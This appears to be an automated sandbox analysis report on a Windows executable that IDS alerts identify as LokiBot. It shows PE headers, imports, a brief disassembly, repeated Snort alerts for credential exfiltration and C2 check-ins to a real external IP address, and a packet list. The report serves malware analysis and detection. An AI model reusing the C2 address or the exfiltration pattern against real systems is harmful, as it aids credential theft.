              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

              File Icon

              Icon Hash:b2a88c96b2ca6a72

              Static PE Info

              General

              Entrypoint:0x403225
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:099c0646ea7282d232219f8807883be0

              Entrypoint Preview

              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409128h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push 00008001h
              call dword ptr [004070B4h]
              push ebx
              call dword ptr [0040727Ch]
              push 00000008h
              mov dword ptr [00423F58h], eax
              call 00007F4D3C573CD0h
              mov dword ptr [00423EA4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F450h
              call dword ptr [00407158h]
              push 004091B0h
              push 004236A0h
              call 00007F4D3C573987h
              call dword ptr [004070B0h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007F4D3C573975h
              push ebx
              call dword ptr [0040710Ch]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423EA0h], eax
              mov eax, edi
              jne 00007F4D3C57119Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007F4D3C573468h
              push eax
              call dword ptr [0040721Ch]
              mov dword ptr [esp+1Ch], eax
              jmp 00007F4D3C5711F5h
              cmp cl, 00000020h
              jne 00007F4D3C571198h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007F4D3C57118Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [eax+eax+00h], 00000000h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x2c1900x2e8dataEnglishUnited States
              RT_DIALOG0x2c4780x100dataEnglishUnited States
              RT_DIALOG0x2c5780x11cdataEnglishUnited States
              RT_DIALOG0x2c6980x60dataEnglishUnited States
              RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
              RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              01/28/22-23:37:07.260369TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976980192.168.2.6185.185.69.76
              01/28/22-23:37:07.260369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.6185.185.69.76
              01/28/22-23:37:07.260369TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.6185.185.69.76
              01/28/22-23:37:07.260369TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976980192.168.2.6185.185.69.76
              01/28/22-23:37:10.277966TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14977080192.168.2.6185.185.69.76
              01/28/22-23:37:10.277966TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.6185.185.69.76
              01/28/22-23:37:10.277966TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.6185.185.69.76
              01/28/22-23:37:10.277966TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24977080192.168.2.6185.185.69.76
              01/28/22-23:37:14.709347TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.6185.185.69.76
              01/28/22-23:37:14.709347TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.6185.185.69.76
              01/28/22-23:37:14.709347TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.6185.185.69.76
              01/28/22-23:37:14.709347TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.6185.185.69.76
              01/28/22-23:37:16.117797TCP2025483ET TROJAN LokiBot Fake 404 Response8049771185.185.69.76192.168.2.6
              01/28/22-23:37:17.458669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.6185.185.69.76
              01/28/22-23:37:17.458669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.6185.185.69.76
              01/28/22-23:37:17.458669TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.6185.185.69.76
              01/28/22-23:37:17.458669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.6185.185.69.76
              01/28/22-23:37:18.890584TCP2025483ET TROJAN LokiBot Fake 404 Response8049773185.185.69.76192.168.2.6
              01/28/22-23:37:20.261992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.6185.185.69.76
              01/28/22-23:37:20.261992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.6185.185.69.76
              01/28/22-23:37:20.261992TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.6185.185.69.76
              01/28/22-23:37:20.261992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.6185.185.69.76
              01/28/22-23:37:21.668707TCP2025483ET TROJAN LokiBot Fake 404 Response8049774185.185.69.76192.168.2.6
              01/28/22-23:37:22.809911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.6185.185.69.76
              01/28/22-23:37:22.809911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.6185.185.69.76
              01/28/22-23:37:22.809911TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.6185.185.69.76
              01/28/22-23:37:22.809911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.6185.185.69.76
              01/28/22-23:37:24.212196TCP2025483ET TROJAN LokiBot Fake 404 Response8049775185.185.69.76192.168.2.6
              01/28/22-23:37:25.398463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.6185.185.69.76
              01/28/22-23:37:25.398463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.6185.185.69.76
              01/28/22-23:37:25.398463TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.6185.185.69.76
              01/28/22-23:37:25.398463TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.6185.185.69.76
              01/28/22-23:37:26.758080TCP2025483ET TROJAN LokiBot Fake 404 Response8049776185.185.69.76192.168.2.6
              01/28/22-23:37:29.263306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.6185.185.69.76
              01/28/22-23:37:29.263306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.6185.185.69.76
              01/28/22-23:37:29.263306TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.6185.185.69.76
              01/28/22-23:37:29.263306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.6185.185.69.76
              01/28/22-23:37:30.738582TCP2025483ET TROJAN LokiBot Fake 404 Response8049779185.185.69.76192.168.2.6
              01/28/22-23:37:33.962521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.6185.185.69.76
              01/28/22-23:37:33.962521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.6185.185.69.76
              01/28/22-23:37:33.962521TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.6185.185.69.76
              01/28/22-23:37:33.962521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.6185.185.69.76
              01/28/22-23:37:35.373624TCP2025483ET TROJAN LokiBot Fake 404 Response8049780185.185.69.76192.168.2.6
              01/28/22-23:37:36.594728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.6185.185.69.76
              01/28/22-23:37:36.594728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.6185.185.69.76
              01/28/22-23:37:36.594728TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.6185.185.69.76
              01/28/22-23:37:36.594728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.6185.185.69.76
              01/28/22-23:37:37.913035TCP2025483ET TROJAN LokiBot Fake 404 Response8049782185.185.69.76192.168.2.6
              01/28/22-23:37:39.408767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.6185.185.69.76
              01/28/22-23:37:39.408767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.6185.185.69.76
              01/28/22-23:37:39.408767TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.6185.185.69.76
              01/28/22-23:37:39.408767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.6185.185.69.76
              01/28/22-23:37:40.689153TCP2025483ET TROJAN LokiBot Fake 404 Response8049783185.185.69.76192.168.2.6
              01/28/22-23:37:41.973820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.6185.185.69.76
              01/28/22-23:37:41.973820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.6185.185.69.76
              01/28/22-23:37:41.973820TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.6185.185.69.76
              01/28/22-23:37:41.973820TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.6185.185.69.76
              01/28/22-23:37:43.403239TCP2025483ET TROJAN LokiBot Fake 404 Response8049784185.185.69.76192.168.2.6
              01/28/22-23:37:44.786353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.6185.185.69.76
              01/28/22-23:37:44.786353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.6185.185.69.76
              01/28/22-23:37:44.786353TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.6185.185.69.76
              01/28/22-23:37:44.786353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.6185.185.69.76
              01/28/22-23:37:46.235905TCP2025483ET TROJAN LokiBot Fake 404 Response8049787185.185.69.76192.168.2.6
              01/28/22-23:37:51.111628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.6185.185.69.76
              01/28/22-23:37:51.111628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.6185.185.69.76
              01/28/22-23:37:51.111628TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.6185.185.69.76
              01/28/22-23:37:51.111628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.6185.185.69.76
              01/28/22-23:37:52.495630TCP2025483ET TROJAN LokiBot Fake 404 Response8049793185.185.69.76192.168.2.6
              01/28/22-23:37:55.089534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.6185.185.69.76
              01/28/22-23:37:55.089534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.6185.185.69.76
              01/28/22-23:37:55.089534TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.6185.185.69.76
              01/28/22-23:37:55.089534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.6185.185.69.76
              01/28/22-23:37:56.498845TCP2025483ET TROJAN LokiBot Fake 404 Response8049795185.185.69.76192.168.2.6
              01/28/22-23:37:59.460407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.6185.185.69.76
              01/28/22-23:37:59.460407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.6185.185.69.76
              01/28/22-23:37:59.460407TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.6185.185.69.76
              01/28/22-23:37:59.460407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.6185.185.69.76
              01/28/22-23:38:00.863838TCP2025483ET TROJAN LokiBot Fake 404 Response8049797185.185.69.76192.168.2.6
              01/28/22-23:38:02.169112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.6185.185.69.76
              01/28/22-23:38:02.169112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.6185.185.69.76
              01/28/22-23:38:02.169112TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.6185.185.69.76
              01/28/22-23:38:02.169112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.6185.185.69.76
              01/28/22-23:38:03.551551TCP2025483ET TROJAN LokiBot Fake 404 Response8049802185.185.69.76192.168.2.6
              01/28/22-23:38:06.424436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.6185.185.69.76
              01/28/22-23:38:06.424436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.6185.185.69.76
              01/28/22-23:38:06.424436TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.6185.185.69.76
              01/28/22-23:38:06.424436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.6185.185.69.76
              01/28/22-23:38:07.849755TCP2025483ET TROJAN LokiBot Fake 404 Response8049818185.185.69.76192.168.2.6
              01/28/22-23:38:10.077239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.6185.185.69.76
              01/28/22-23:38:10.077239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.6185.185.69.76
              01/28/22-23:38:10.077239TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.6185.185.69.76
              01/28/22-23:38:10.077239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.6185.185.69.76
              01/28/22-23:38:11.381909TCP2025483ET TROJAN LokiBot Fake 404 Response8049830185.185.69.76192.168.2.6
              01/28/22-23:38:12.712442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.6185.185.69.76
              01/28/22-23:38:12.712442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.6185.185.69.76
              01/28/22-23:38:12.712442TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.6185.185.69.76
              01/28/22-23:38:12.712442TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.6185.185.69.76
              01/28/22-23:38:14.111048TCP2025483ET TROJAN LokiBot Fake 404 Response8049840185.185.69.76192.168.2.6
              01/28/22-23:38:17.281043TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.6185.185.69.76
              01/28/22-23:38:17.281043TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.6185.185.69.76
              01/28/22-23:38:17.281043TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.6185.185.69.76
              01/28/22-23:38:17.281043TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.6185.185.69.76
              01/28/22-23:38:18.654023TCP2025483ET TROJAN LokiBot Fake 404 Response8049841185.185.69.76192.168.2.6
              01/28/22-23:38:20.171529TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.6185.185.69.76
              01/28/22-23:38:20.171529TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.6185.185.69.76
              01/28/22-23:38:20.171529TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.6185.185.69.76
              01/28/22-23:38:20.171529TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.6185.185.69.76
              01/28/22-23:38:21.628648TCP2025483ET TROJAN LokiBot Fake 404 Response8049842185.185.69.76192.168.2.6
              01/28/22-23:38:23.240806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.6185.185.69.76
              01/28/22-23:38:23.240806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.6185.185.69.76
              01/28/22-23:38:23.240806TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.6185.185.69.76
              01/28/22-23:38:23.240806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.6185.185.69.76
              01/28/22-23:38:24.676434TCP2025483ET TROJAN LokiBot Fake 404 Response8049845185.185.69.76192.168.2.6
              01/28/22-23:38:27.482883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.6185.185.69.76
              01/28/22-23:38:27.482883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.6185.185.69.76
              01/28/22-23:38:27.482883TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.6185.185.69.76
              01/28/22-23:38:27.482883TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.6185.185.69.76
              01/28/22-23:38:28.925374TCP2025483ET TROJAN LokiBot Fake 404 Response8049850185.185.69.76192.168.2.6
              01/28/22-23:38:31.054520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.6185.185.69.76
              01/28/22-23:38:31.054520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.6185.185.69.76
              01/28/22-23:38:31.054520TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.6185.185.69.76
              01/28/22-23:38:31.054520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.6185.185.69.76
              01/28/22-23:38:32.352724TCP2025483ET TROJAN LokiBot Fake 404 Response8049851185.185.69.76192.168.2.6
              01/28/22-23:38:33.510655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.6185.185.69.76
              01/28/22-23:38:33.510655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.6185.185.69.76
              01/28/22-23:38:33.510655TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.6185.185.69.76
              01/28/22-23:38:33.510655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.6185.185.69.76
              01/28/22-23:38:35.007775TCP2025483ET TROJAN LokiBot Fake 404 Response8049852185.185.69.76192.168.2.6
              01/28/22-23:38:37.134931TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.6185.185.69.76
              01/28/22-23:38:37.134931TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.6185.185.69.76
              01/28/22-23:38:37.134931TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.6185.185.69.76
              01/28/22-23:38:37.134931TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.2.6185.185.69.76
              01/28/22-23:38:38.454947TCP2025483ET TROJAN LokiBot Fake 404 Response8049854185.185.69.76192.168.2.6
              01/28/22-23:38:40.133791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.6185.185.69.76
              01/28/22-23:38:40.133791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.6185.185.69.76
              01/28/22-23:38:40.133791TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.6185.185.69.76
              01/28/22-23:38:40.133791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.6185.185.69.76
              01/28/22-23:38:41.392922TCP2025483ET TROJAN LokiBot Fake 404 Response8049855185.185.69.76192.168.2.6
              01/28/22-23:38:42.445022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.6185.185.69.76
              01/28/22-23:38:42.445022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.6185.185.69.76
              01/28/22-23:38:42.445022TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.6185.185.69.76
              01/28/22-23:38:42.445022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.6185.185.69.76
              01/28/22-23:38:43.841937TCP2025483ET TROJAN LokiBot Fake 404 Response8049862185.185.69.76192.168.2.6
              01/28/22-23:38:46.720808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.6185.185.69.76
              01/28/22-23:38:46.720808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.6185.185.69.76
              01/28/22-23:38:46.720808TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.6185.185.69.76
              01/28/22-23:38:46.720808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.6185.185.69.76
              01/28/22-23:38:48.177226TCP2025483ET TROJAN LokiBot Fake 404 Response8049870185.185.69.76192.168.2.6
              01/28/22-23:38:49.452650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.6185.185.69.76
              01/28/22-23:38:49.452650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.6185.185.69.76
              01/28/22-23:38:49.452650TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.6185.185.69.76
              01/28/22-23:38:49.452650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.6185.185.69.76
              01/28/22-23:38:50.674109TCP2025483ET TROJAN LokiBot Fake 404 Response8049881185.185.69.76192.168.2.6
              01/28/22-23:38:52.315956TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.6185.185.69.76
              01/28/22-23:38:52.315956TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.6185.185.69.76
              01/28/22-23:38:52.315956TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.6185.185.69.76
              01/28/22-23:38:52.315956TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.6185.185.69.76
              01/28/22-23:38:53.689454TCP2025483ET TROJAN LokiBot Fake 404 Response8049882185.185.69.76192.168.2.6
              01/28/22-23:38:54.799526TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.6185.185.69.76
              01/28/22-23:38:54.799526TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.6185.185.69.76
              01/28/22-23:38:54.799526TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.6185.185.69.76
              01/28/22-23:38:54.799526TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.6185.185.69.76
              01/28/22-23:38:56.145381TCP2025483ET TROJAN LokiBot Fake 404 Response8049883185.185.69.76192.168.2.6
              01/28/22-23:38:57.255335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.6185.185.69.76
              01/28/22-23:38:57.255335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.6185.185.69.76
              01/28/22-23:38:57.255335TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.6185.185.69.76
              01/28/22-23:38:57.255335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.6185.185.69.76
              01/28/22-23:38:58.636997TCP2025483ET TROJAN LokiBot Fake 404 Response8049885185.185.69.76192.168.2.6
              01/28/22-23:39:00.138023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.6185.185.69.76
              01/28/22-23:39:00.138023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.6185.185.69.76
              01/28/22-23:39:00.138023TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.6185.185.69.76
              01/28/22-23:39:00.138023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.6185.185.69.76
              01/28/22-23:39:01.668779TCP2025483ET TROJAN LokiBot Fake 404 Response8049886185.185.69.76192.168.2.6

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 28, 2022 23:37:07.201168060 CET4976980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:07.257311106 CET8049769185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:07.257415056 CET4976980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:07.260369062 CET4976980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:07.318835974 CET8049769185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:07.318934917 CET4976980192.168.2.6185.185.69.76
